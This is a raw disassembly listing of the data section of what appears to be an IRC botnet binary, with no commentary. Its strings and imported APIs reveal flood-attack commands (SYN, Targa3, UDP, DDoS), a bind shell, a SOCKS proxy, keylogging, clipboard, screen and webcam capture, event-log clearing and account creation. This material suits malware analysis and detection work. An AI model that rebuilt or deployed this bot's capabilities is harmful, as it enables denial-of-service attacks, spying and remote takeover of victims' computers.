dword_42CBC8 dd 676E6950h, 6F6C6620h, 646Fh ; DATA XREF: sub_401ACD+12B4�o
; sub_401ACD+1420�o
dword_42CBD4 dd 234032Dh, 2706475h, 2D03h ; DATA XREF: sub_401ACD+129B�o
; sub_401ACD+13FC�o
dword_42CBE0 dd 20504455h, 6F6F6C66h, 64h ; DATA XREF: sub_401ACD+1296�o
; sub_401ACD+13F7�o
aPacketstop db 'packetstop',0 ; DATA XREF: sub_401ACD+1236�o
align 4
dword_42CBF8 dd 234032Dh, 6B6E6F77h, 2D0302h ; DATA XREF: sub_401ACD+122B�o
; sub_401ACD+12F8�o
dword_42CC04 dd 6B6E6F57h, 6F6C6620h, 646Fh ; DATA XREF: sub_401ACD+1226�o
; sub_401ACD+12F3�o
aWonkstop db 'wonkstop',0 ; DATA XREF: sub_401ACD+120D�o
align 4
dword_42CC1C dd 234032Dh, 67726174h, 3023361h, 2Dh ; DATA XREF: sub_401ACD+1202�o
; sub_401ACD+12DA�o
dword_42CC2C dd 67726154h, 66203361h, 646F6F6Ch, 0 ; DATA XREF: sub_401ACD+11FD�o
; sub_401ACD+12D5�o
aTarga3stop db 'targa3stop',0 ; DATA XREF: sub_401ACD+11E4�o
align 4
dword_42CC48 dd 234032Dh, 73796B73h, 3026E79h, 2Dh ; DATA XREF: sub_401ACD+11D9�o
; sub_401ACD+1358�o
dword_42CC58 dd 53796B53h, 66206E79h, 646F6F6Ch, 0 ; DATA XREF: sub_401ACD+11D4�o
; sub_401ACD+1353�o
aSkysynstop db 'skysynstop',0 ; DATA XREF: sub_401ACD+11BB�o
align 4
dword_42CC74 dd 234032Dh, 26E7973h, 2D03h ; DATA XREF: sub_401ACD+11B0�o
; sub_401ACD+127A�o
dword_42CC80 dd 206E7953h, 6F6F6C66h, 64h ; DATA XREF: sub_401ACD+11AB�o
; sub_401ACD+1275�o
aSynstop db 'synstop',0 ; DATA XREF: sub_401ACD+1192�o
dword_42CC94 dd 234032Dh, 736F6464h, 2D0302h ; DATA XREF: sub_401ACD+1187�o
; sub_401ACD+125C�o
dword_42CCA0 dd 536F4444h, 6F6C6620h, 646Fh ; DATA XREF: sub_401ACD+1182�o
; sub_401ACD+1257�o
dword_42CCAC dd 736F6464h, 6F74732Eh, 70h ; DATA XREF: sub_401ACD+1169�o
dword_42CCB8 dd 234032Dh, 69646572h, 74636572h, 2D0302h ; DATA XREF: sub_401ACD+115E�o
dword_42CCC8 dd 20504354h, 69646572h, 74636572h, 0 ; DATA XREF: sub_401ACD+1159�o
aRedirectstop db 'redirectstop',0 ; DATA XREF: sub_401ACD+1140�o
align 4
dword_42CCE8 dd 234032Dh, 2676F6Ch, 2D03h ; DATA XREF: sub_401ACD+1135�o
dword_42CCF4 dd 20676F4Ch, 7473696Ch, 0 ; DATA XREF: sub_401ACD+1130�o
aLogstop db 'logstop',0 ; DATA XREF: sub_401ACD+1117�o
dword_42CD08 dd 234032Dh, 70747468h, 2D030264h, 0 ; DATA XREF: sub_401ACD+110C�o
aHttpstop db 'httpstop',0 ; DATA XREF: sub_401ACD+10EE�o
align 4
dword_42CD24 dd 234032Dh, 676F6C72h, 2646E69h, 2D03h ; DATA XREF: sub_401ACD+10E3�o
aRloginstop db 'rloginstop',0 ; DATA XREF: sub_401ACD+10C5�o
align 10h
dword_42CD40 dd 234032Dh, 6B636F73h, 3023473h, 2Dh ; DATA XREF: sub_401ACD+10BD�o
aSocks4stop db 'socks4stop',0 ; DATA XREF: sub_401ACD+109F�o
align 4
aS4 db 's4',0 ; DATA XREF: sub_401ACD+108A�o
align 10h
aSocks4 db 'socks4',0 ; DATA XREF: sub_401ACD+1075�o
align 4
dword_42CD68 dd 234032Dh, 646E6962h, 6C656873h, 2D03026Ch, 0
; DATA XREF: sub_401ACD+1053�o
aServer_0 db 'Server',0 ; DATA XREF: sub_401ACD+104E�o
; sub_401ACD+10B8�o ...
align 4
aBindshellstop db 'bindshellstop',0 ; DATA XREF: sub_401ACD+1035�o
align 4
aBd db 'bd',0 ; DATA XREF: sub_401ACD+1020�o
align 4
aBindshell db 'bindshell',0 ; DATA XREF: sub_401ACD+100B�o
align 4
aUnsec db 'unsec',0 ; DATA XREF: sub_401ACD+FF6�o
align 4
aUnsecure db 'unsecure',0 ; DATA XREF: sub_401ACD+FE1�o
align 4
aSec db 'sec',0 ; DATA XREF: sub_401ACD+FCC�o
; sub_401ACD+2D6A�o
aSecure db 'secure',0 ; DATA XREF: sub_401ACD+FB7�o
; sub_401ACD+2D59�o
align 4
aSt db 'st',0 ; DATA XREF: sub_401ACD+FA2�o
align 4
aSpeedtest db 'speedtest',0 ; DATA XREF: sub_401ACD+F8D�o
align 4
aDed db 'ded',0 ; DATA XREF: sub_401ACD+F78�o
aDedication db 'dedication',0 ; DATA XREF: sub_401ACD+F63�o
align 4
aVer db 'ver',0 ; DATA XREF: sub_401ACD+F4E�o
aVersion db 'version',0 ; DATA XREF: sub_401ACD+F39�o
aLo db 'lo',0 ; DATA XREF: sub_401ACD+F24�o
align 4
aLogout db 'logout',0 ; DATA XREF: sub_401ACD+F0F�o
align 4
aD: ; DATA XREF: sub_401ACD+EFA�o
; UPX0:00438314�o ...
unicode 0, <d>,0
aDie db 'die',0 ; DATA XREF: sub_401ACD+EE5�o
aRn db 'rn',0 ; DATA XREF: sub_401ACD+ED0�o
align 4
aRndnick db 'rndnick',0 ; DATA XREF: sub_401ACD+EB8�o
a63 db '63',0 ; DATA XREF: sub_401ACD+D85�o
align 4
asc_42CE14: ; DATA XREF: sub_401ACD+D5D�o
unicode 0, <)>,0
aChr db '$chr(',0 ; DATA XREF: sub_401ACD+D20�o
align 10h
aServer_1 db '$server',0 ; DATA XREF: sub_401ACD+D15�o
aRndnick_0 db '$rndnick',0 ; DATA XREF: sub_401ACD+D04�o
align 4
aChan db '$chan',0 ; DATA XREF: sub_401ACD+CE8�o
align 4
aUser_0 db '$user',0 ; DATA XREF: sub_401ACD+CD7�o
align 4
aMe db '$me',0 ; DATA XREF: sub_401ACD+CC5�o
aD_0 db '$%d',0 ; DATA XREF: sub_401ACD+C57�o
aD_1 db '$%d-',0 ; DATA XREF: sub_401ACD+B93�o
align 4
asc_42CE54: ; DATA XREF: sub_401ACD+ABB�o
; UPX0:0043832C�o ...
unicode 0, <l>,0
unk_42CE58 db 2Dh ; - ; DATA XREF: sub_401ACD+A80�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aChatFailedByUn db '- Chat failed by unauthorized user: %s.',0
align 4
unk_42CE8C db 2Dh ; - ; DATA XREF: sub_401ACD+A6F�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aChatAlreadyAct db '- Chat already active with user: %s.',0
align 4
unk_42CEBC db 2Dh ; - ; DATA XREF: sub_401ACD+A5E�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToSta_31 db '- Failed to start chat thread, error: <%d>.',0
align 4
unk_42CEF4 db 2Dh ; - ; DATA XREF: sub_401ACD+9EF�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aChatFromUserS_ db '- Chat from user: %s.',0
align 4
aChat db 'CHAT',0 ; DATA XREF: sub_401ACD+958�o
align 4
unk_42CF1C db 2Dh ; - ; DATA XREF: sub_401ACD+938�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aReceiveFileSFa db '- Receive file: ',27h,'%s',27h,' failed from unauthorized user: %s.',0
align 10h
unk_42CF60 db 2Dh ; - ; DATA XREF: sub_401ACD+920�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToSta_32 db '- Failed to start transfer thread, error: <%d>.',0
align 4
dword_42CF9C dd 49544F4Eh, 25204543h, 13A2073h, 474E4950h, 1732520h
; DATA XREF: sub_401ACD+90F�o
dd 0A0Dh
dword_42CFB4 dd 4E495001h, 47h ; DATA XREF: sub_401ACD+8DB�o
dword_42CFBC dd 49544F4Eh, 25204543h, 13A2073h, 53524556h, 204E4F49h
; DATA XREF: sub_401ACD+8D0�o
dd 0D017325h, 0Ah
dword_42CFD8 dd 52455601h, 4E4F4953h, 1 ; DATA XREF: sub_401ACD+89F�o
dword_42CFE4 dd 23h ; DATA XREF: sub_401ACD+816�o
; sub_40CA80+1B�o
unk_42CFE8 db 2Dh ; - ; DATA XREF: sub_401ACD+785�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aReceiveFileSFr db '- Receive file: ',27h,'%s',27h,' from user: %s.',0
align 4
aS_2 db '%s',0 ; DATA XREF: sub_401ACD+706�o
; sub_401ACD+995�o ...
align 4
aSend_0 db 'SEND',0 ; DATA XREF: sub_401ACD+6DF�o
align 4
dword_42D024 dd 43434401h, 0 ; DATA XREF: sub_401ACD+6C1�o
dword_42D02C dd 323333h ; DATA XREF: sub_401ACD+64B�o
; sub_401ACD+ADD�o ...
aNotice db 'NOTICE',0 ; DATA XREF: sub_401ACD+629�o
; sub_409A73+F�o
align 4
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_401ACD+61D�o
; sub_409A73+16�o
unk_42D040 db 2Dh ; - ; DATA XREF: sub_401ACD+5CC�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUserSLoggedOut db 'User: %s logged out.',0
align 4
unk_42D064 db 2Dh ; - ; DATA XREF: sub_401ACD+5A5�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aJoinedChanne_0 db 'Joined channel: %s.',0
a353 db '353',0 ; DATA XREF: sub_401ACD+574�o
aQuit db 'QUIT',0 ; DATA XREF: sub_401ACD+537�o
; sub_40E992+5DE�o
align 10h
aPart db 'PART',0 ; DATA XREF: sub_401ACD+526�o
; sub_401ACD+5E9�o
align 4
aSS db ':%s%s',0 ; DATA XREF: sub_401ACD+4FE�o
align 10h
aNick db 'NICK',0 ; DATA XREF: sub_401ACD+3D0�o
align 4
aNoticeSS db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+371�o
; sub_401ACD+60D�o
unk_42D0B8 db 2Dh ; - ; DATA XREF: sub_401ACD+355�o
; sub_401ACD+2EBD�o ...
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUserSLoggedO_0 db 'User %s logged out.',0
aKick db 'KICK',0 ; DATA XREF: sub_401ACD+2E4�o
align 10h
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+28D�o
; sub_401ACD+7C8F�o ...
align 4
a433 db '433',0 ; DATA XREF: sub_401ACD+262�o
; sub_4177D0:loc_417838�o
a@: ; DATA XREF: sub_401ACD+23A�o
unicode 0, <@>,0
a302 db '302',0 ; DATA XREF: sub_401ACD+22A�o
a005 db '005',0 ; DATA XREF: sub_401ACD+215�o
a001 db '001',0 ; DATA XREF: sub_401ACD+200�o
aJoinSS db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+1E4�o
; sub_401ACD+3B7�o ...
align 10h
aPongS db 'PONG %s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+1C3�o
align 4
aPing db 'PING',0 ; DATA XREF: sub_401ACD+1A9�o
; sub_4177D0+50�o
align 4
asc_42D124: ; DATA XREF: sub_401ACD+19A�o
; sub_401ACD+7DAE�o
unicode 0, <!>,0
asc_42D128: ; DATA XREF: sub_401ACD+A8�o
; sub_401ACD+E5D�o ...
unicode 0, < >,0
asc_42D12C db ' :',0 ; DATA XREF: sub_401ACD+86�o
; sub_401ACD:loc_402602�o
align 10h
aSSS_0 db '%s %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_409A73+5D�o
aCapgetdriverde db 'capGetDriverDescriptionA',0 ; DATA XREF: sub_409B13+C7F�o
align 4
aCapcreatecaptu db 'capCreateCaptureWindowA',0 ; DATA XREF: sub_409B13+C77�o
aAvicap32_dll db 'avicap32.dll',0 ; DATA XREF: sub_409B13:loc_40A77D�o
align 10h
aSqldisconnect db 'SQLDisconnect',0 ; DATA XREF: sub_409B13+C15�o
align 10h
aSqlfreehandle db 'SQLFreeHandle',0 ; DATA XREF: sub_409B13+C08�o
align 10h
aSqlallochandle db 'SQLAllocHandle',0 ; DATA XREF: sub_409B13+BFB�o
align 10h
aSqlexecdirect db 'SQLExecDirect',0 ; DATA XREF: sub_409B13+BEE�o
align 10h
aSqlsetenvattr db 'SQLSetEnvAttr',0 ; DATA XREF: sub_409B13+BE1�o
align 10h
aSqldriverconne db 'SQLDriverConnect',0 ; DATA XREF: sub_409B13+BD9�o
align 4
aOdbc32_dll db 'odbc32.dll',0 ; DATA XREF: sub_409B13:loc_40A6DF�o
align 10h
aShchangenotify db 'SHChangeNotify',0 ; DATA XREF: sub_409B13+B97�o
align 10h
aShellexecutea db 'ShellExecuteA',0 ; DATA XREF: sub_409B13+B8F�o
align 10h
aShell32_dll db 'shell32.dll',0 ; DATA XREF: sub_409B13:loc_40A695�o
aWnetcancelco_0 db 'WNetCancelConnection2W',0 ; DATA XREF: sub_409B13+B3D�o
align 4
aWnetcancelconn db 'WNetCancelConnection2A',0 ; DATA XREF: sub_409B13+B30�o
align 4
aWnetaddconne_0 db 'WNetAddConnection2W',0 ; DATA XREF: sub_409B13+B23�o
aWnetaddconnect db 'WNetAddConnection2A',0 ; DATA XREF: sub_409B13+B1B�o
aMpr_dll db 'mpr.dll',0 ; DATA XREF: sub_409B13:loc_40A621�o
aDeleteipnetent db 'DeleteIpNetEntry',0 ; DATA XREF: sub_409B13+AD9�o
align 10h
aGetipnettable db 'GetIpNetTable',0 ; DATA XREF: sub_409B13+AD1�o
align 10h
aIphlpapi_dll db 'iphlpapi.dll',0 ; DATA XREF: sub_409B13:loc_40A5D7�o
align 10h
aDnsflushreso_0 db 'DnsFlushResolverCacheEntry_A',0 ; DATA XREF: sub_409B13+A8F�o
align 10h
aDnsflushresolv db 'DnsFlushResolverCache',0 ; DATA XREF: sub_409B13+A87�o
align 4
aDnsapi_dll db 'dnsapi.dll',0 ; DATA XREF: sub_409B13:loc_40A58D�o
align 4
aNetwkstagetinf db 'NetWkstaGetInfo',0 ; DATA XREF: sub_409B13+9F9�o
aNetmessagebuff db 'NetMessageBufferSend',0 ; DATA XREF: sub_409B13+9EC�o
; sub_4185A5+65�o
align 4
aNetusergetinfo db 'NetUserGetInfo',0 ; DATA XREF: sub_409B13+9DF�o
align 4
aNetuserenum db 'NetUserEnum',0 ; DATA XREF: sub_409B13+9D2�o
aNetuserdel db 'NetUserDel',0 ; DATA XREF: sub_409B13+9C5�o
align 4
aNetuseradd db 'NetUserAdd',0 ; DATA XREF: sub_409B13+9B8�o
align 10h
aNetremotetod db 'NetRemoteTOD',0 ; DATA XREF: sub_409B13+9AB�o
align 10h
aNetapibufferfr db 'NetApiBufferFree',0 ; DATA XREF: sub_409B13+99E�o
align 4
aNetschedulejob db 'NetScheduleJobAdd',0 ; DATA XREF: sub_409B13+991�o
align 4
aNetshareenum db 'NetShareEnum',0 ; DATA XREF: sub_409B13+984�o
align 4
aNetsharedel db 'NetShareDel',0 ; DATA XREF: sub_409B13+977�o
aNetshareadd db 'NetShareAdd',0 ; DATA XREF: sub_409B13+96F�o
aNetapi32_dll db 'netapi32.dll',0 ; DATA XREF: sub_409B13:loc_40A471�o
; sub_4185A5+58�o
align 10h
aIcmpsendecho db 'IcmpSendEcho',0 ; DATA XREF: sub_409B13+921�o
align 10h
aIcmpclosehandl db 'IcmpCloseHandle',0 ; DATA XREF: sub_409B13+914�o
aIcmpcreatefile db 'IcmpCreateFile',0 ; DATA XREF: sub_409B13+90C�o
align 10h
aIcmp_dll db 'icmp.dll',0 ; DATA XREF: sub_409B13:loc_40A412�o
align 4
aMozilla4_0Comp db 'Mozilla/4.0 (compatible)',0 ; DATA XREF: sub_409B13+8D2�o
align 4
aInternetcloseh db 'InternetCloseHandle',0 ; DATA XREF: sub_409B13+860�o
aInternetreadfi db 'InternetReadFile',0 ; DATA XREF: sub_409B13+853�o
align 10h
aInternetcracku db 'InternetCrackUrlA',0 ; DATA XREF: sub_409B13+846�o
align 4
aInternetopenur db 'InternetOpenUrlA',0 ; DATA XREF: sub_409B13+839�o
align 4
aInternetopena db 'InternetOpenA',0 ; DATA XREF: sub_409B13+82C�o
align 4
aInternetconnec db 'InternetConnectA',0 ; DATA XREF: sub_409B13+81F�o
align 4
aHttpsendreques db 'HttpSendRequestA',0 ; DATA XREF: sub_409B13+812�o
align 10h
aHttpopenreques db 'HttpOpenRequestA',0 ; DATA XREF: sub_409B13+805�o
align 4
aInternetgetc_0 db 'InternetGetConnectedStateEx',0 ; DATA XREF: sub_409B13+7F8�o
aInternetgetcon db 'InternetGetConnectedState',0 ; DATA XREF: sub_409B13+7F0�o
align 4
aWininet_dll db 'wininet.dll',0 ; DATA XREF: sub_409B13:loc_40A2F2�o
aClosesocket db 'closesocket',0 ; DATA XREF: sub_409B13+6A6�o
aGetpeername db 'getpeername',0 ; DATA XREF: sub_409B13+699�o
aGethostbyaddr db 'gethostbyaddr',0 ; DATA XREF: sub_409B13+68C�o
align 10h
aGethostbyname db 'gethostbyname',0 ; DATA XREF: sub_409B13+67F�o
align 10h
aGethostname db 'gethostname',0 ; DATA XREF: sub_409B13+672�o
aGetsockname db 'getsockname',0 ; DATA XREF: sub_409B13+665�o
aSetsockopt db 'setsockopt',0 ; DATA XREF: sub_409B13+658�o
align 4
aAccept db 'accept',0 ; DATA XREF: sub_409B13+64B�o
align 4
aListen db 'listen',0 ; DATA XREF: sub_409B13+63E�o
align 4
aSelect db 'select',0 ; DATA XREF: sub_409B13+631�o
align 4
aBind db 'bind',0 ; DATA XREF: sub_409B13+629�o
align 4
aRecvfrom db 'recvfrom',0 ; DATA XREF: sub_409B13+617�o
align 10h
aRecv db 'recv',0 ; DATA XREF: sub_409B13+60A�o
align 4
aSendto db 'sendto',0 ; DATA XREF: sub_409B13+5FD�o
align 10h
aNtohl db 'ntohl',0 ; DATA XREF: sub_409B13+5E3�o
align 4
aNtohs db 'ntohs',0 ; DATA XREF: sub_409B13+5D6�o
align 10h
aHtonl db 'htonl',0 ; DATA XREF: sub_409B13+5C9�o
align 4
aHtons db 'htons',0 ; DATA XREF: sub_409B13+5BC�o
align 10h
aInet_addr db 'inet_addr',0 ; DATA XREF: sub_409B13+5AF�o
align 4
aInet_ntoa db 'inet_ntoa',0 ; DATA XREF: sub_409B13+5A2�o
align 4
aConnect db 'connect',0 ; DATA XREF: sub_409B13+595�o
aIoctlsocket db 'ioctlsocket',0 ; DATA XREF: sub_409B13+588�o
aSocket db 'socket',0 ; DATA XREF: sub_409B13+57B�o
align 4
aWsacleanup db 'WSACleanup',0 ; DATA XREF: sub_409B13+56E�o
align 10h
aWsagetlasterro db 'WSAGetLastError',0 ; DATA XREF: sub_409B13+561�o
aWsaioctl db 'WSAIoctl',0 ; DATA XREF: sub_409B13+554�o
align 4
a__wsafdisset db '__WSAFDIsSet',0 ; DATA XREF: sub_409B13+547�o
align 4
aWsaasyncselect db 'WSAAsyncSelect',0 ; DATA XREF: sub_409B13+53A�o
align 4
aWsasocketa db 'WSASocketA',0 ; DATA XREF: sub_409B13+52D�o
align 4
aWsastartup db 'WSAStartup',0 ; DATA XREF: sub_409B13+525�o
align 4
aWs2_32_dll db 'ws2_32.dll',0 ; DATA XREF: sub_409B13+514�o
align 10h
aDeleteobject db 'DeleteObject',0 ; DATA XREF: sub_409B13+4A1�o
align 10h
aDeletedc db 'DeleteDC',0 ; DATA XREF: sub_409B13+494�o
align 4
aBitblt db 'BitBlt',0 ; DATA XREF: sub_409B13+487�o
align 4
aSelectobject db 'SelectObject',0 ; DATA XREF: sub_409B13+47A�o
align 4
aGetdibcolortab db 'GetDIBColorTable',0 ; DATA XREF: sub_409B13+46D�o
align 4
aGetdevicecaps db 'GetDeviceCaps',0 ; DATA XREF: sub_409B13+460�o
align 4
aCreatecompatib db 'CreateCompatibleDC',0 ; DATA XREF: sub_409B13+453�o
align 4
aCreatedibsecti db 'CreateDIBSection',0 ; DATA XREF: sub_409B13+446�o
align 10h
aCreatedca db 'CreateDCA',0 ; DATA XREF: sub_409B13+43E�o
align 4
aGdi32_dll db 'gdi32.dll',0 ; DATA XREF: sub_409B13:loc_409F40�o
align 4
aGetusernamea db 'GetUserNameA',0 ; DATA XREF: sub_409B13:loc_409F18�o
align 4
aIsvalidsecurit db 'IsValidSecurityDescriptor',0 ; DATA XREF: sub_409B13+3AD�o
align 4
aEnumservicesst db 'EnumServicesStatusA',0 ; DATA XREF: sub_409B13+3A0�o
aCloseserviceha db 'CloseServiceHandle',0 ; DATA XREF: sub_409B13+393�o
align 4
aDeleteservice db 'DeleteService',0 ; DATA XREF: sub_409B13+386�o
align 4
aControlservice db 'ControlService',0 ; DATA XREF: sub_409B13+379�o
align 4
aStartservicea db 'StartServiceA',0 ; DATA XREF: sub_409B13+36C�o
align 4
aOpenservicea db 'OpenServiceA',0 ; DATA XREF: sub_409B13+35F�o
align 4
aOpenscmanagera db 'OpenSCManagerA',0 ; DATA XREF: sub_409B13:loc_409E6A�o
align 4
aAdjusttokenpri db 'AdjustTokenPrivileges',0 ; DATA XREF: sub_409B13+327�o
align 4
aLookupprivileg db 'LookupPrivilegeValueA',0 ; DATA XREF: sub_409B13+31A�o
align 4
aOpenprocesstok db 'OpenProcessToken',0 ; DATA XREF: sub_409B13:loc_409E25�o
align 10h
aCleareventloga db 'ClearEventLogA',0 ; DATA XREF: sub_409B13+2C6�o
align 10h
aOpeneventloga db 'OpenEventLogA',0 ; DATA XREF: sub_409B13+2B9�o
align 10h
aRegclosekey db 'RegCloseKey',0 ; DATA XREF: sub_409B13+2AC�o
aRegdeletevalue db 'RegDeleteValueA',0 ; DATA XREF: sub_409B13+29F�o
aRegqueryvaluee db 'RegQueryValueExA',0 ; DATA XREF: sub_409B13+292�o
align 10h
aRegsetvalueexa db 'RegSetValueExA',0 ; DATA XREF: sub_409B13+285�o
align 10h
aRegcreatekeyex db 'RegCreateKeyExA',0 ; DATA XREF: sub_409B13+278�o
aRegopenkeyexa db 'RegOpenKeyExA',0 ; DATA XREF: sub_409B13+270�o
align 10h
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: sub_409B13:loc_409D72�o
align 10h
aGetforegroundw db 'GetForegroundWindow',0 ; DATA XREF: sub_409B13+21A�o
aGetwindowtexta db 'GetWindowTextA',0 ; DATA XREF: sub_409B13+20D�o
align 4
aGetkeystate db 'GetKeyState',0 ; DATA XREF: sub_409B13+200�o
aGetasynckeysta db 'GetAsyncKeyState',0 ; DATA XREF: sub_409B13:loc_409D0B�o
align 4
aExitwindowsex db 'ExitWindowsEx',0 ; DATA XREF: sub_409B13+1A0�o
align 4
aCloseclipboard db 'CloseClipboard',0 ; DATA XREF: sub_409B13+193�o
align 4
aGetclipboardda db 'GetClipboardData',0 ; DATA XREF: sub_409B13+186�o
align 4
aOpenclipboard db 'OpenClipboard',0 ; DATA XREF: sub_409B13+179�o
align 4
aDestroywindow db 'DestroyWindow',0 ; DATA XREF: sub_409B13+16C�o
align 4
aIswindow db 'IsWindow',0 ; DATA XREF: sub_409B13+15F�o
align 4
aFindwindowa db 'FindWindowA',0 ; DATA XREF: sub_409B13+152�o
aSendmessagea db 'SendMessageA',0 ; DATA XREF: sub_409B13+14A�o
align 10h
aUser32_dll db 'user32.dll',0 ; DATA XREF: sub_409B13:loc_409C48�o
; sub_424D78+D�o
align 4
aRegisterservic db 'RegisterServiceProcess',0 ; DATA XREF: sub_409B13:loc_409C1B�o
align 4
aQueryperform_0 db 'QueryPerformanceFrequency',0 ; DATA XREF: sub_409B13+A0�o
align 10h
aQueryperforman db 'QueryPerformanceCounter',0 ; DATA XREF: sub_409B13+93�o
aSearchpatha db 'SearchPathA',0 ; DATA XREF: sub_409B13+86�o
aGetdrivetypea db 'GetDriveTypeA',0 ; DATA XREF: sub_409B13+79�o
align 4
aGetlogicaldriv db 'GetLogicalDriveStringsA',0 ; DATA XREF: sub_409B13+6C�o
aGetdiskfreespa db 'GetDiskFreeSpaceExA',0 ; DATA XREF: sub_409B13+5F�o
aModule32first db 'Module32First',0 ; DATA XREF: sub_409B13+52�o
align 10h
aProcess32next db 'Process32Next',0 ; DATA XREF: sub_409B13+45�o
align 10h
aProcess32first db 'Process32First',0 ; DATA XREF: sub_409B13+38�o
align 10h
aCreatetoolhelp db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_409B13+2B�o
align 4
aSeterrormode db 'SetErrorMode',0 ; DATA XREF: sub_409B13+23�o
align 4
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_409B13+A�o
align 4
unk_42DA2C db 2Dh ; - ; DATA XREF: sub_40A7CF+2F2�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aDllTestComplet db 'DLL test complete.',0
align 4
aAvicap32_dllFa db 'Avicap32.dll failed. <%d>',0 ; DATA XREF: sub_40A7CF+2CC�o
align 4
aOdbc32_dllFail db 'Odbc32.dll failed. <%d>',0 ; DATA XREF: sub_40A7CF+298�o
aShell32_dllFai db 'Shell32.dll failed. <%d>',0 ; DATA XREF: sub_40A7CF+264�o
align 4
aMpr32_dllFaile db 'Mpr32.dll failed. <%d>',0 ; DATA XREF: sub_40A7CF+230�o
align 4
aIphlpapi_dllFa db 'Iphlpapi.dll failed. <%d>',0 ; DATA XREF: sub_40A7CF+1FC�o
align 10h
aDnsapi_dllFail db 'Dnsapi.dll failed. <%d>',0 ; DATA XREF: sub_40A7CF+1C8�o
aNetapi32_dllFa db 'Netapi32.dll failed. <%d>',0 ; DATA XREF: sub_40A7CF+194�o
align 4
aIcmp_dllFailed db 'Icmp.dll failed. <%d>',0 ; DATA XREF: sub_40A7CF+160�o
align 4
aWininet_dllFai db 'Wininet.dll failed. <%d>',0 ; DATA XREF: sub_40A7CF+12C�o
align 4
aWs2_32_dllFail db 'Ws2_32.dll failed. <%d>',0 ; DATA XREF: sub_40A7CF+F8�o
aGdi32_dllFaile db 'Gdi32.dll failed. <%d>',0 ; DATA XREF: sub_40A7CF+C4�o
align 4
aAdvapi32_dllFa db 'Advapi32.dll failed. <%d>',0 ; DATA XREF: sub_40A7CF+90�o
align 4
aUser32_dllFail db 'User32.dll failed. <%d>',0 ; DATA XREF: sub_40A7CF+5C�o
aKernel32_dllFa db 'Kernel32.dll failed. <%d>',0 ; DATA XREF: sub_40A7CF+28�o
align 4
a_: ; DATA XREF: sub_40D99C+10�o
; sub_40F96B+252�o
unicode 0, <.>,0
unk_42DBBC db 2Dh ; - ; DATA XREF: sub_40AB32:loc_40ABF1�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aNotSupportedBy db 'not supported by this system',0
align 4
unk_42DBEC db 2Dh ; - ; DATA XREF: sub_40AB32:loc_40ABBF�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aUnableToAlloca db 'unable to allocate ARP cache',0
align 4
unk_42DC1C db 2Dh ; - ; DATA XREF: sub_40AB32:loc_40AB8B�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aArpCacheIsEmpt db 'ARP cache is empty',0
align 10h
unk_42DC40 db 2Dh ; - ; DATA XREF: sub_40AB32+49�o
db 3, 34h, 2
db 66h ; f
db 6Ch, 75h, 73h
db 68h ; h
db 64h, 6Eh, 73h
db 2
db 3, 2Dh, 20h
aErrorGettingAr db 'error getting ARP cache: %d',0
aD_D_D_D db '%d.%d.%d.%d',0 ; DATA XREF: sub_40AC10+46�o
; sub_40BFEC+38�o ...
aReal db 'real',0
align 10h
dd 0
dword_42DC84 dd 0 ; DATA XREF: sub_40B08E+7�o
off_42DC88 dd offset sub_40ACB6 ; DATA XREF: sub_40B08E+49�r
aConst db 'const',0
align 8
dd 1, 40AD23h, 7474656Ch, 7265h, 0
dd 2, 40AD81h, 706D6F63h, 2 dup(0)
dd 3, 40ADCEh, 6E756F63h, 797274h, 0
dd 4, 40AE6Ch, 736Fh, 2 dup(0)
dd 5, 40AEE1h
off_42DCF0 dd offset aAbdulrazak ; DATA XREF: sub_40ACB6+21�r
; "Abdulrazak"
dd offset aAckerman ; "Ackerman"
dd offset aAdams ; "Adams"
off_42DCFC dd offset aAddison ; DATA XREF: sub_40B08E+39�o
; "Addison"
dd offset aAdelstein ; "Adelstein"
dd offset aAdibe ; "Adibe"
dd offset aAdorno ; "Adorno"
dd offset aAhlers ; "Ahlers"
dd offset aAlavi ; "Alavi"
dd offset aAlcorn ; "Alcorn"
dd offset aAlda ; "Alda"
dd offset aAleks ; "Aleks"
dd offset aAllison ; "Allison"
dd offset aAlongi ; "Alongi"
dd offset aAltavilla ; "Altavilla"
dd offset aAltenberger ; "Altenberger"
dd offset aAltenhofen ; "Altenhofen"
dd offset aAmaral ; "Amaral"
dd offset aAmatangelo ; "Amatangelo"
dd offset aAmeer ; "Ameer"
dd offset aAmsden ; "Amsden"
dd offset aAnand ; "Anand"
dd offset aAndel ; "Andel"
dd offset aAndo ; "Ando"
dd offset aAndrelus ; "Andrelus"
dd offset aAndron ; "Andron"
dd offset aAnfinrud ; "Anfinrud"
dd offset aAnsley ; "Ansley"
dd offset aAnthony ; "Anthony"
dd offset aAntos ; "Antos"
dd offset aArbia ; "Arbia"
dd offset aArduini ; "Arduini"
